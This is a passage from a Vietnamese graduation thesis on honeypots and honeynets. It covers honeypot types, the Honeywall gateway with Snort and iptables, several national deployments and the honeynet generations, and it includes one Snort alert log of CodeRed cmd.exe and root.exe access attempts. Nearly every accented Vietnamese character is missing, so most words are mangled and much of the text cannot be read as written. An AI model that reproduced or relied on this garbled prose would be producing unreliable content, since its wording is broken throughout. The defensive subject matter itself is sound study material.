You are on page 1of 112

n Tt Nghip MC LC DANH MC CC HNH....................................................................................................3 LI NI U ..........................................4 Chng I TNG QUAN V H THNG HONEYNET................................6 1. HONEYPOT ...............................................................................................................6 1.1.

. Khi nim Honeypot: ..........................................................................................6 1.2. Phn loi Honeypot: .........................................................................................9 2. Honeynet....................................................................................................................10 2.1. Khi nim Honeynet : .......................................................................................10 2.2. Cc chc nng ca Honeynet...............................................................................12 2.3. Mt s m hnh trin khai Honeynet trn th gii ..............................................13 3. Vai tr v ngha ca Honeynet................................................................................17 CHNG II- M HNH KIN TRC HONEYNET.....................................18 1. M hnh kin trc vt l.............................................................................................18 1.1. M hnh kin trc Honeynet th h I ..............................................................18 1.2. M hnh kin trc Honeynet II, III......................................................................20 1.3. H thng Honeynet o.........................................................................................21 2. M hnh kin trc loggic ca Honeynet.....................................................................23 2.1. Module iu khin d liu (hay kim sot d liu).............................................24 2.1.1. Vai tr - nhim v ca Module iu khin ....................................................24 2.1.2. C ch kim sot d liu...............................................................................26 2.1.3. Kim sot d liu trong Honeynet II.............................................................28 2.2. Module thu nhn d liu......................................................................................33 2.2.1. Vai tr - nhim v ca Module thu nhn d liu...........................................33 2.2.2. C ch thu nhn d liu.................................................................................34 2.3. Modul phn tch d liu.......................................................................................40 2.3.1. Vai tr............................................................................................................40 2.3.2. C ch phn tch d liu................................................................................40 Chng III MT S K THUT TN CNG DCH V WEB................................43 Cc k thut tn cng c bn.........................................................................................45 Cc nguy c mt an ton dch v web........................................................................45 Chim hu phin lm vic (Session Mangement)......................................................45 Li dng vic thiu st trong vic kim tra d liu nhp hp l (Input validation)...45 T Chi Dch V (Denial of service (DoS)................................................................46
1 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Tn cng SQL Injection..............................................................................................46 Khi nim SQL Injection............................................................................................46 Cc dng tn cng thng gp....................................................................................47 Bin php phng chng..............................................................................................56 Chn m lnh thc thi trn trnh duyt nn nhn(Cross-Site Scripting).....................59 Gii thiu v XSS.......................................................................................................59 Phng php tn cng XSS truyn thng...................................................................60 Tn cng XSS bng Flash...........................................................................................61 Cch phng chng.......................................................................................................62 Tn cng t chi dch v (Deny of service - DoS).....................................................63 Khi nim 63 Cc nguy c tn cng bng DOS................................................................................64 Mt s dn tn cng thng gp.................................................................................64 Bin php phng chng..............................................................................................68 Cc k thut tn cng mi nht. ....................................................................................69 Kiu tn cng padding oracle crypto ......................................................................69 Evercookie 70 Tn cng Autocomplete..............................................................................................70 Tn cng HTTPS bng cache injection......................................................................70 B qua bo v CSRF bng ClickJacking v HTTP Parameter Pollution...................70 Universal XSS trong IE8............................................................................................70 HTTP POST DoS........................................................................................................70 JavaSnoop 71 Tn cng qua CSS History trong Firefox khng cn JavaScript cho PortScanning trong mng ni b.......................................................................................................71 Java Applet DNS Rebinding.......................................................................................71 Tng kt chung qu trnh tn cng ca Hacker..............................................................71 Chng IV -TRIN KHAI- CI T- VN HNH H THNG HONEYNET..........74 1. M hnh trin khai thc t.........................................................................................74 2. Ci t v cu hnh h thng Honeynet......................................................................75
2 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip 2.1. Ci t v cu hnh Honeywall............................................................................75 2.2 Ci t v cu hnh Sebek.....................................................................................86 3. Vn hnh h thng Honeynet v phn tch k thut tn cng ca Hacker ...............88 Kch bn tn cng.......................................................................................................88 Phn tch k thut tn cng ca hacker.......................................................................89 Qu trnh hacker thc hin tn cng Website.............................................................89 S dng Honeynet phn tch k thut tn cng ca Hacker..................................97 Nhn xt kt qu phn tch v bin php khc phc li SQL-injection ca website b tn cng trn..............................................................................................................108 4. ng dng Honeynet trong thc t hin nay.............................................................110 .....................................................................................110 KT LUN...........................................................................111 ...................................................................................................................111 ..........................................................................................................................111

DANH MC CC HNH Hnh 1.1- Cc loi hnh Honeypot.......................................................................................9 Hnh 1.2 - M hnh kin trc honeynet..............................................................................11 Hnh 1.3 - S trin khai d n Artemis i hc Bc Kinh, Trung Quc......................13 Hnh 1.4 - S trin khai Honeynet ca Greek Honeynet Project..................................14 Hnh 1.5 - S trin khai Honeynet ca UK Honeynet Project......................................16

3 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

LI NI U Ngy nay, Cng ngh thng tin ang pht trin vi tc v bo, bn cnh nhng mt tch cc v li ch to ln m X hi thng tin mang li cho nhn loi th li tn ti cc mt tiu cc nh : cc nguy c tn cng mng nhm ph hoi h thng mng, nguy c b nh cp cc thng tin nhy cm ca c nhn, cc t chc, doanh nghip, cc c quan Nh nc .. ngn chn li nhng nguy c ny, i hi cc C quan, t chc, doanh nghip, phi t chc xy dng cc H thng an ninh mng nhm m bo an ton cho H thng mng ca C quan mnh. V trong v s cc bin php ngn chn , th "Honeypot" (tm gi l Mt ong) v "Honeynet" (tm gi l T ong) c coi l mt trong nhng cm by ht sc hiu qu, c thit k vi mc ch ny. i vi cc tin tc th H thng ny qu l nhng Cm by ng s ; v vy, gii Hacker thng xuyn thng bo cp nht cc h thng Honeynet mi c trin khai trn th gii cc din n Hacker, nhm trnh sa by nhng h thng Honeynet ny. Khc vi cc h thng An ninh mng khc nh: H thng pht hin xm nhp v chng xm nhp ( IDS - IPS ), H thng Firewall,, c thit k lm vic th ng trong vic pht hin - ngn chn s tn cng ca tin tc ( Hacker ) vo h thng mng; th
4 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Honeynet li c thit k nhm ch ng li ko Hacker tn cng vo h thng gi c b tr bn cnh h thng tht nhm mc ch:

Thu thp cc k thut phng php tn cng, cc cng c m Hacker s dng, c bit l cc k thut tn cng mng mi , cc mu virus- m c mi. Gip chng ta sm pht hin ra cc l hng bo mt tn ti trn cc sn phm cng ngh thng tin trin khai - ci t trn H thng tht. T , sm c bin php ng ph - khc phc kp thi. ng thi, cng kim tra an ton ca h thng mng, cc dch v mng ( nh : Web, DNS, Mail,), v an ton - tin cy - cht lng ca cc sn phm thng mi cng ngh thng tin khc ( c bit l cc H iu hnh nh : Unix, Linux, Window,).

Thu thp cc thng tin, du vt ca Hacker ( nh : a ch IP ca my Hacker s dng tn cng, v tr a l ca Hacker, thi gian Hacker tn cng,). T , gip chuyn gia an ninh mng truy tm th phm. Tuy nhin, do iu kin thi gian c hn nn trong n tt nghip ch trnh by

ni dung Nghin cu H thng Honeypots v Honeynet nhm nghin cu mt s k thut tn cng dch v Web, nh gip chng ta sm pht hin v kp thi khc phc cc li hng bo mt tn ti trn dch v Web. Em hi vng thng qua ni dung trnh by nghin cu ca em di y s gip chng ta hiu c H thng Honeynet cng vi vai tr - tc dng to ln ca H thng ny trong nhim v m bo An ninh mng hin nay.

5 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Chng I TNG QUAN V H THNG HONEYNET


Chng ny s trnh by kin thc tng quan, c bn v Honeynet bao gm: ngun gc, qu trnh pht trin ca Honeynet; cc khi nim v Honeypot, Honeynet, phn loi Honeypot; v chc nng, vai tr, ngha ca Honeynet trong nhim v m bo an ninh mng, cng vi mt s m hnh trin khai Honeynet trn th gii. 1. HONEYPOT 1.1. Khi nim Honeypot: Honeypot l mt cng ngh mi vi tim nng khng l cho cng ng bo mt. nh ngha u tin c a ra u tin bi mt vi biu tng v bo mt my tnh, c th l Cliff Stoll trong cun sch The Cuckoos Egg v trong bi bo ca Bill Cheswick. T , Honeypot tip tc c pht trin vi nhng cng c bo mt mnh m m chng ta bit cho n nay. Thut ng Honeypot c nhc n ln u tin vo ngy 4 thng 8 nm 1999 trong bi bo To Buil a Honeypot ca tc gi Lance Spitzner mt trong nhng ngi ng ra thnh lp d n Honeynet ( Honeynet Project ), gii thiu v tng xy dng h thng Honeynet nhm mc ch nghin cu cc k thut tn cng ca Hacker; t , c bin php ngn chn tn cng kp thi. V thng 6 nm 2000, d n Honeynet c thnh lp bi 30 chuyn gia an ninh mng cc Cng ty bo mt nh: Foundstone, Security Focus, Source Fre, ., tnh nguyn tham gia nghin cu phi li nhun.

6 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip D n Honeynet c trin khai 8 quc gia ( M, n , Hy Lp,) vi 12 trm Honeynet, bao gm 24 h thng Unix v 19 h thng Linux, cng vi mt s h thng khc nh : Suse 6.3, Suse 7.1,Window, Bc u tin hiu c Honeypot th trc ht phi hiu Honeypot l ci g?N khng ging nh firewall, hay h thng IDS, Honeypot khng gii quyt c th mt vn no . Thay vo , n l mt cng c rt linh hot trong c nhiu hnh dng v kch c. N c th lm tt c mi th t pht hin cc cuc tn cng m ha trong cc mng IPv6. S linh hot ny cung cp mt sc mnh thc s cho Honeypot. N cng l s hn hp lm cho k tn cng kh xc nh v hiu. Honeypot l mt h thng ti nguyn thng tin c xy dng vi mc ch gi dng nh la nhng k s dng v xm nhp khng hp php, thu ht s ch ca chng, ngn khng cho chng tip xc vi h thng tht. Honeypot c th c xem nh Mt ong; v tt nhin l Honeypot cng c phi c Mt ngt tc l c cha cc H thng ti nguyn thng tin c gi tr, nhy cm, c tnh b mt nh : thng tin v chng khon, thng tin ti khon cc ngn hng, thng tin b mt an ninh quc gia., lm mi d Hacker ch n tn cng. H thng ti nguyn thng tin c ngha l Honeypot c th gi dng bt c loi my ch ti nguyn no nh l Mail Server, Domain Name Server, Web Server, c ci t chy trn bt c H iu hnh no nh: Linux ( Red hat, Fedora), Unix( Solaris), Window ( Window NT, Window 2000, Window XP, Window 2003, Vista,..), .Honeypot s trc tip tng tc vi tin tc v tm cch khai thc thng tin v tin tc nh hnh thc tn cng, cng c tn cng hay cch thc tin hnh tn thay v b tn cng.
-

u im ca Honeypot: Honeypot l mt khi nim rt n gin, trong cung cp mt s c im mnh m.

D liu nh c t gi tr cao: Honeypot thu thp mt lng nh thng tin. Thay v ng nhp mt GB d liu mt ngy, h ch phi ng nhp mt MB d liu mt ngy. Thay v to ra 10.000 cnh bo mi ngy, n c th ch to 10 thng bo mi ngy. Hy nh rng, Honeypot ch nm bt cc hnh ng xu, bt k s tng tc vi Honeypot nh khng xc thc hay cc hnh ng c
7

Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip hi. Nh vy, Honeypot gim thiu c ting n, c ngh l vi b thu thp d liu nh, nhng thng tin c gi tr cao, nhng ch l nhng hnh ng xu. iu ny c ngha l s d dng hn nhiu phn tch cc d liu m Honeypot thu thp v ly c gi tr t n. Cng c v chin thut mi: Honeypots c thit k nm bt tt c nhng g c tng tc vo n, bao gm cc cng c, chin thut khng bao gi thy trc.

Ngun lc ti thiu: Honeypots yu cu ngun lc ti thiu, n ch nm bt cc hot ng xu. iu ny c ngha l mt my tnh 128MB b nh RAM c th d dng x l mt mng lp B ton b ngi mt mng OC-12.

M ha hay IPv6: Khng ging nh hu ht cc cng ngh bo mt( nh h thng IDS) cc Honeypots lm vic tt trong mi trng m ha hay IPv6. N khng phn bit nhng iu g tng tc vi n. N ch nm bt cc hnh ng xu.

Thng tin: Honeypots c th thu thp mt vi thng tin chi tit.

Honeypots l cng ngh ng gin, t c nhng sai lm hoc cu hnh sai.


-

Nhc im ca Honeypot: Ging nh nhiu cng ngh, cc Honeypots cng c nhng yu im. l do chng khng th thay th cc cng ngh hin ti, nhng lm vic vi cc cng ngh hin c.

Hn ch View: Honeypots ch c th theo di v nm bt hot ng trc tip tng tc vi h. Honeypots s khng nm bt cc cuc tn cng chng li cc h thng khc, tr khi k tn cng hoc e da tng tc vi cc honeypots.

Ri ro: Tt c cc cng ngh bo mt u c nguy c. Tng la c nguy c b xm nhp, m ha c nguy c b ph v, cc cm bin IDS c nguy c khng pht hin cc cuc tn cng. Honeypots cng khng phi l trng hp khc, honeypots c nguy c c thc hin trn ca k xu v c s dng gy tn hi cho cc h thng khc. C rt nhiu nguy c khc nhau dn n s khc nhau ca Honeypots.

8 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip 1.2. Phn loi Honeypot: Honeypot c chia lm hai loi chnh: Tng tc thp v tng tc cao

Tng tc thp: Honeypot ch ci t chng trnh (chng hn nh: Honeyd,

BackOfficer Friendly, Specter,) m phng gi cc dch v, ng dng, v h iu hnh. Loi ny c mc ri ro thp, d trin khai v bo dng nhng li b gii hn v dch v.

Tng tc cao: Honeypot c ci t, chy cc dch v, ng dng v h iu

hnh thc ( Chng hn nh Honeynet ). Loi ny c mc thng tin thu thp c cao nhng mc ri ro cao v tn thi gian vn hnh v bo dng.

Hnh 1.1- Cc loi hnh Honeypot Mt s v d v cc loi honeypot : a) BackOfficer Friendly (BOF): l mt loi hnh Honeypot rt d vn hnh v cu hnh v c th hot ng trn bt k phin bn no ca Windows v Unix nhng nhc im ca n l ch tng tc c vi mt s dch v n gin nh FTP, Telnet, SMTP b) Specter: y cng l loi hnh Honeypot tng tc thp nhng c kh nng tng tc tt hn so BackOfficer, loi Honeypot ny c th gi lp trn 14 cng ( Port ); v c th cnh bo, qun l t xa. Tuy nhin, cng ging nh BackOfficer th Specter c nhc im l b gii hn s dch v v khng linh hot. c) Honeyd:
9 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip * Loi Honeypot ny c th lng nghe trn tt c cc cng TCP v UDP, nhng dch v m phng c thit k vi mc ch ngn chn v ghi li nhng cuc tn cng, tng tc vi k tn cng trong vai tr l mt h thng nn nhn. * Hin nay, Honeyd c nhiu phin bn v c th m phng c khong 473 h iu hnh. * Honeyd l loi hnh Honeypot tng tc thp c nhiu u im tuy nhin Honeyd c nhc im l khng th cung cp mt h iu hnh tht tng tc vi tin tc v khng c c ch cnh bo khi pht hin h thng b xm nhp hoc gp phi nguy him. 2. Honeynet 2.1. Khi nim Honeynet : Mt trong cc cng c chnh m Nhm d n Honeynet s dng thu thp thng tin l Honeynet. Honeynet khc vi cc h thng Firewall, h thng pht hin v ngn chn xm nhp, h thng m ha ch : cc h thng tuy u c kh nng bo v h thng mng v ti nguyn mng nhng cc h thng ny u l thc hin nhim v Phng th, mang tnh th ng; ngc li, Honeynet li l h thng ch ng li ko, thu ht s ch v tn cng ca Hacker nhm thu thp cc thng tin ca Hacker nh: K thut tn cng ca Hacker, cng c Hacker s dng, cc loi m c mi c xut hin,.... Honeynet (tm gi l T ong) l mt hnh thc ca honeypot tng tc cao. Khc vi cc honeypot khc, Honeynet l mt h thng tht, hon ton ging mt mng lm vic bnh thng ; v Honeynet cung cp cc h thng, ng dng, cc dch v tht nh : Web, Mail, File server,... H thng Honeynet c th trin khai xy dng nhiu c quan, t chc vi nhiu mc ch khc nhau nh: Cc c quan nh nc, doanh nghip c th s dng Honeynet nhm kim tra an ton ca h thng mng ca mnh v ngn chn k tn cng tn cng vo h thng tht; cc c quan, t chc, doanh nghip hot ng trong lnh vc an ninh mng c th s dng Honeynet nhm thu thp cc loi m c hi mi nh: virus, worm, spyware, trojan, , kp thi vit chng trnh cp nht dit m c cho sn phm Anti-virus ca cng ty mnh..
10 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Nhim v quan trng nht khi Trin khai xy dng ci t mt h thng Honeynet chnh l Honeywall. Honeywall l gateway gia honeypot v mng bn ngoi. N hot ng tng 2 nh l Bridged. Cc lung d liu khi vo v ra t honeypot u phi i qua Honeywall. kim sot cc lung d liu ny, cng nh thu thp cc du hiu tn cng, v ngn chn tn cng ca cc Hacker th Honeywall s dng hai cng c chnh l: * Mt l IDS Snort (hay cn gi l IDS sensor) gm c cc lut ( Rule ) nh ngha cc du hiu tn cng, v thc hin hin bt cc gi tin ( Packet ). * Hai l Firewall Iptables gm c cc lut (Rule) nh ngha s cho php (Allow ) hoc khng cho php ( Deny ) cc truy cp t bn ngoi vo hoc bn trong h thng ra, v kim sot cc lung d liu qua Honeywall. Di y l mt v d v Honeynet:

Hnh 1.2 - M hnh kin trc honeynet Vi m hnh ny Honeywall gm c 3 card mng l : eth0, eth1, eth2 . Card mng eth0 th kt ni vi Production Network, card eth1 th kt ni vi cc Honeypot, cn card th 3 kt ni vi Router. Khi Hacker t bn ngoi Internet tn cng vo h thng th cc Honeypot s ng vai tr l h thng tht tng tc vi Hacker, v thc hin thu thp cc
11 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip thng tin ca Hacker nh : a ch IP ca my Hacker s dng, K thut Hacker tn cng, cc cng c m Hacker s dng . Cc thng tin ny u s b ghi li trn Honeywall, v c cc chuyn gia an ninh mng s dng phn tch k thut tn cng ca Hacker ; qua , nh gi c mc an ton ca h thng, v c bin php kp thi khc phc cc im yu tn ti trong h thng . 2.2. Cc chc nng ca Honeynet a. iu khin d liu: chc nng ny s thc hin cc cng vic sau : - Khi Hacker s dng cc m c ( nh : virus, trojan, spyware, worm,) thm nhp vo H thng Honeynet, th hai cng c IDS Snort v Firewall Iptable trn Honeywall s thc hin kim sot cc hot ng ca cc loi m c ny, cng nh cc hnh vi m Hacker thc hin trn h thng ; ng thi a ra cc cnh bo cho ngi qun l h thng bit kp thi s l. - Cc lung d liu khi i vo khng b hn ch, nhng khi i ra ngoi th s b hn ch . Chnh v vy, m Hacker s rt kh khn, thm tr nu H thng Honeynet c Cu hnh tt th Hacker s khng th thu thp c y thng tin v h thng ca ta, iu ny cng c ngha l Hacker s khng th thm nhp thnh cng vo h thng mng. b. Thu nhn d liu: Khi d liu i vo th honeynet s xem xt v ghi li tt c cc hot ng c tnh ph hoi v sau s phn tch cc ng c hot ng ca tin tc. V chnh cng c IDS Snort trn Honeywall thc hin chc nng ny. Da trn cc lut ( rule) nh ngha du hiu tn cng m Snort s cho rng mt hot ng c c coi l hot ng c tnh ph hoi hay khng, nu phi n s thc hin ghi li log v a ra cc cnh bo. Nh vy, m ton b qa trnh tn cng ca Hacker u s c ghi li mt cch chi tit. c. Phn tch d liu: Mc ch chnh ca honeynet chnh l thu thp thng tin. Khi c thng tin th ngi dng cn phi c kh nng phn tch cc thng tin ny. thc hin tt cng vic ny, i hi ngi phn tch phi c mt kin thc rt tt v an ninh

12 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip mng, phi am hiu v cc k thut tn cng mng. V vy, thng thng ngi thc hin phn tch thng l cc chuyn gia an ninh mng. d. Thu thp d liu: Trong tng hp h thng trin khai nhiu Honeynet th phi thu thp d liu t cc honeynet v mt ngun tp trung. Thng th ch c cc cc t chc, trung tm an ninh mng ln c quy m ton cu th h mi trin khai nhiu honeynet, c bit l cc Cng ty cung cp cc sn phm dit virus nh: Trend Micro, Symantec.. Cn a s cc t chc ch c mt honeynet. 2.3. Mt s m hnh trin khai Honeynet trn th gii Di y l mt s m hnh trin khai h thng Honeynet trn th gii nhm nghin cu, thu thp thng tin k thut tn cng ca Hacker trn mng: a. M hnh trin khai Honeynet ca i hc Bc Kinh-Trung Quc

Hnh 1.3 - S trin khai d n Artemis i hc Bc Kinh, Trung Quc Hnh 1.3 l s trin khai Honeynet ti i hc Bc Kinh, Trung Quc trong mt d n c tn l Artemis. Hin ti, d n ang trin khai trn nn Honeynet th h th III, m hnh trin khai gm ba honeypot vi cc h iu hnh khc nhau: Red Hat Linux9.0,
13 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Windows XP, Windows 2000 v cc honeypot o c gi lp chng trnh honeyd. V m hnh ny, Honeywall gm c 3 card mng: Card th 1 c kt ni vi 1 Router bn ngoi Card th 2 c kt ni vi cc Honeypot bn trong Card th 3 th c kt ni an ton vi My Console Khi Hacker tn cng vo th ba Honeypot v Honeypot o s tng tc vi Hacker, v tin hnh thu thp cc thng tin ca Hacker nh: a ch IP ca my Hacker s dng, cc tool m Hacker dng, cch thc Hacker thm nhp vo h thng Ton b qu trnh tn cng ca Hacker s c Honeywall ghi li v a ra cc cnh bo ( Alert ) cho ngi dng bit. b. M hnh trin khai Honeynet trong d n Honeynet ti Hy Lp

Hnh 1.4 - S trin khai Honeynet ca Greek Honeynet Project


14 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Hnh 1.4 l s trin khai Honeynet trong d n Honeynet ti Hy Lp, h thng Honeynet s dng Honeywall phin bn roo-1.0.hw-189, mt honeypot vi h iu hnh Red Hat 9.0 (DNS Server) v bn honeypot o gi lp bng honeyd cc h iu hnh: MS Windows XP Pro SP1, Linux 2.4.20, Solaris 9 v Cisco 1601R IOS 12.1(5). Trong m hnh ny, Honeywall cng c ba card mng, v s trin cng gn ging vi m hnh trin khai ca i hc Bc Kinh nhng ch khc ch gia my Console (Remote Management and Analysis Network ) v bn my Honeypot o c thm mt Firewall. Firewall ny s m bo bo v an ton cho my Consle ngay c khi Hacker kim sot c cc Honeypot o ny. c. M hnh trin khai Honeynet trong d n Honeynet ti Anh

15 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

Hnh 1.5 - S trin khai Honeynet ca UK Honeynet Project Cui cng, hnh 1.5 m t s trin khai Honeynet ca d n Honeynet ti Anh. Trong m hnh ny, h trin khai bn Honeypot vi cc h iu hnh: Red hat 7.3, Fedora Core 1, Sun Solaris 7, Sun Solaris 9. M hnh ny cng gn ging vi hai m hnh trn; ch khc nhau ch My Console ngoi kt ni ti Honeywall th cn kt ni vi Router v c bo v bng mt Firewall ng gia.

16 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip

3. Vai tr v ngha ca Honeynet Qua cc phn trn, ta c th tm tt li cc vai tr v ngha ca Honeynet nh sau: Honeynet gip khm ph, thu thp cc phng php - k thut tn cng ca Hacker, cc cng c Hacker s dng, c bit l cc k thut tn cng mi , cc mu virus- m c mi.Nh c nhng phn tch, nh hng mc tiu tn cng, thi im tn cng, k thut tn cng, ca Hacker. T , kp thi a ra cc d bo, cnh bo sm mi ngi phng trnh. V d gn y nht l v cnh bo ca cc chuyn gia an ninh mng th gii v t tn cng ca Hacker bng m c su (worm) Conficker vo ngy 1/4/2009. Tuy nhin, do c cnh bo t trc v s n lc ca cc chuyn gia an ninh mng quc t m t tn cng ny khng din ra nh mong i ca Hacker. Nh vy, Honeynet hot ng nh mt h thng cnh bo sm. Honeynet l mi trng th nghim c kim sot an ton gip sm pht hin ra cc l hng bo mt tn ti trn cc sn phm cng ngh thng tin trin khai - ci t trn H thng tht (c bit l cc l hng Zero day). T , sm c bin php ng ph khc phc kp thi. ng thi, honeynet cng gip kim tra an ton ca h thng mng, cc dch v mng ( nh : Web, DNS, Mail,), v kim tra an ton - tin cy cht lng ca cc sn phm thng mi cng ngh thng tin khc (c bit l cc H iu hnh nh: Unix, Linux, Window,). Thu thp cc thng tin, du vt ca Hacker ( nh : a ch IP ca my Hacker s dng tn cng, v tr a l ca Hacker, thi gian Hacker tn cng,). T , gip chuyn gia an ninh mng truy tm th phm. Kt lun: Qua chng ny, chng ta c nhng hiu bit, kin thc c bn v Honeynet cng vi vai tr v mc ch ca xy dng trin khai H thng ny, v chng ta cng bit mt s m hnh Honeynet c trin khai trn th gii . chng sau, chng ta s tm hiu k hn v m hnh kin trc v nguyn l hot ng ca H thng ny.

17 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip CHNG II- M HNH KIN TRC HONEYNET chng trc, chng ta hiu c c bn v Honeynet. chng ny, n s tip tc trnh by v qu trnh pht trin m hnh kin trc vt l ca Honeynet. V n cng trnh by m hnh logic ca Honeynet gip chng ta hiu c qu trnh hot ng ca Honeynet, thng qua ba Module ca m hnh logic l: Module iu khin d liu Module thu nhn d liu Module phn tch d liu 1. M hnh kin trc vt l 1.1. M hnh kin trc Honeynet th h I M hnh Honeynet th h I gm mt mng ring bit c to ra t ng sau mt thit b iu khin truy nhp mng, thng l tng la (Firewall); v bt k lung d liu vo ra Honeynet u phi i qua tng la. Honeyney c b tr trn mt mng ring bit vi vng mng sn xut gim nguy c mt an ton cho h thng.

Hnh 2.1- M hnh kin trc vt l Honetnet th h I


18 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip m hnh Honeynet th h I ny th h thng tng la (Firewall) v H thng pht hin xm nhp ( Instruction Detection System IDS) l hai h thng c lp nhau. y chnh l s khc bit gia Honeynet I vi Honeynet II v Honeynet III. m hnh Honeynet II v III th hai h thng Firewall v IDS c kt hp thnh mt h thng Gateway duy nht l Honeywall. Trong h thng Honeynet, Firewall gi vai tr kim sot cc lung d liu ra vo h thng, nhm ch cho Hacker tn cng vo Honeynet v ngn chn khng cho Hacker tn cng vo vng mng sn xut hay khng cho Hacker bin Honeynet lm cng c tn cng cc H thng mng bn ngoi. Firewall thc hin c nhim v ny l da vo cc lut (Rule) nh ngha s cho php (Allow) hoc khng cho php (Deny ) cc truy cp t bn ngoi vo hoc bn trong h thng ra. Di y l hnh minh ha mt s lut ca Firewall (Check Ponit) i vi Honeynet:

Hnh 2.2 Mt s lut Firewall i vi Honeynet Bn cnh Firewall, Honeynet cn b tr h thng pht hin xm nhp IDS-Snort. Snort c nhim v kp thi pht hin v ngn chn cc k thut tn cng c bit, c nh ngha trong tp lut (Rule) ca Snort (Cc lut ca Snort nh ngha cc du hiu, cc mu tn cng mng). Snort thc hin thanh tra ni dung cc gi tin, v so snh ni dung cc gi tin ny vi tp lut. Khi Snort pht hin thy cc gi tin c ni
19 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip dung gy nguy him cho h thng mng th Snort s chn cc gi tin ny li ngn chn tn cng ca Hacker vo h thng v a ra cnh bo cho ngi qun tr bit. Di y l mt v d v cnh bo ca Snort khi pht hin thy s tn cng ca su Red Code lan truyn trn mng qua dch v web: [**] [1:1256:2] WEB-IIS CodeRed v2 root.exe access [**] [Classification: Web Application Attack] [Priority: 1] 12/21-22:07:24.686743 216.80.148.118:2094 -> 10.1.1.106:80 TCP TTL:111 TOS:0x0 ID:17545 IpLen:20 DgmLen:112 DF ***AP*** Seq: 0xE34143C1 Ack: 0x68B5B8F Win: 0x2238 TcpLen: 20 [**] [1:1002:2] WEB-IIS cmd.exe access [**] [Classification: Web Application Attack] [Priority: 1] 12/21-22:08:50.889673 216.80.148.118:1864 -> 10.1.1.106:80 TCP TTL:111 TOS:0x0 ID:24785 IpLen:20 DgmLen:120 DF ***AP*** Seq: 0xEEE40D32 Ack: 0x8169FC4 Win: 0x2238 TcpLen: 20 1.2. M hnh kin trc Honeynet II, III Honeynet th h II c pht trin vo nm 2002 v Honeynet th h III c a ra vo cui nm 2004. V c bn, Honeynet II v Honeynet III c cng mt kin trc. im khc bit chnh l Honeynet III ci tin vic trin khai v qun l. Mt thay i c bn trong kin trc ca Honeynet II v Honeynet III so vi Honeynet I l s dng mt thit b n l iu khin vic kim sot d liu v thu nhn d liu c gi l Honeywall (Honeynet Sensor). Honeywall l s kt chc nng ca hai h thng tng la Firewall v h thng pht hin xm nhp IDS ca m hnh kin trc Honeynet I. Nh vy chng ta d dng trin khai v qun l hn. S thay i trong Honeywall ch yu module kim sot d liu. Honeywall lm vic tng hai (trong m hnh OSI) nh l mt thit b Bridge. Nh s thay i ny m Honeynet II, Honeynet III khin cho k tn cng kh pht hin ra l chng ang tng tc vi H thng by Honeynet v hai u card mng ca eth0 (kt ni vi mng bn
20 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip ngoi Honeynet pha hacker) v eth1 (kt ni vi Honeynet) u khng c a ch mng IP. V vy, Honeynet hon ton trong sut vi Hacker.

Hnh 2.3 - M hnh kin trc Honeyney th h II, III 1.3. H thng Honeynet o Vic trin khai- xy dng h thng Honeynet yu cu t mt lng ln thit b phn cng ty theo quy m ca h thng Honeynet m chng ta cn trin khai. Nhm gim chi ph u t mt lng ln thit b phn cng trn, ngi ta a ra mt m hnh kin trc Honeynet mi. l M hnh kin trc h thng Honeynet o. V mt bn cht, m hnh ny vn c bn ging nh Honeynet II v III, vn s dng mt Honeywall Gateway nhng ch khc ch Honeyney o l mt m hnh kin trc vt l mi ca Honeynet nhm trin khai hu nh ton b h thng Honeynet trn mt h thng my n ( My tht). Mc ch lm gim chi ph xy dng h thng Honeynet v d dng cho qun l. Hai la chn trin khai h thng Honeynet o l s dng cng c phn mn VMWare v User Mode Linux cho php to ra nhiu my tnh o trn mt h thng my tnh tht. Trong , VMWare l sn phm thng mi, gii php c h tr thit k chy trn a mi trng h iu hnh cng mt lc. VMWare ch chy trn kin trc Intel bi vy ch cc h iu hnh trn kin trc Intel mi lm vic VMWare. Cn User
21 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip Mode Linux (cn gi l UML) l gii php m ngun m vi tnh nng tng t. Tuy nhin, UML hin ti ang b gii hn cho h iu hnh Linux. Bn cnh nhng u im, h thng Honeynet o cng mt s hn ch l b gii hn h iu hnh v kin trc c h tr bi phn mm.

Hnh 2.4 - M hnh kin trc Honeynet o S trn gm hay my tnh vt l: My tnh th nht l Honeynet gateway (ci Honeywall) hot ng cng nh m hnh Honeynet II, III l kim sot d liu, thu nhn d liu cho Honeynet. V trn my th hai th ci t nhiu h iu hnh my o, mi h iu hnh my o l mt honeypot. Tm li: trong cc m hnh kin trc Honeynet trn th ngy nay m hnh Honeynet o l ph bin hn c. Tuy nhin, hot ng ca Honeynet trong m hnh ny vn ging nh hot ng ca Honeynet II,III, v c bn ging nh Honeynet I. Phn trnh by ca n v M hnh kin trc loggic ca Honeynet di y s cho chng ta hiu r v phng thc hot ng, lm vic ca H thng Honeynet,

22 Hc Vin K Thut Mt M Khoa An Ton Thng Tin

n Tt Nghip 2. M hnh kin trc loggic ca Honeynet D Honeynet c trin khai xy dng theo m hnh no, th h Honeynet no i na th Honeynet vn c m hnh kin trc loggic chung nh sau:

H thng Honeynet
Lung thng tin iu khin d liu (Kim sot d liu) Chnh sch (IPtables + Snort)

Thu nhn d liu (Sebek client-server)

Lu tr d liu

Phn tch d liu ( Walley)

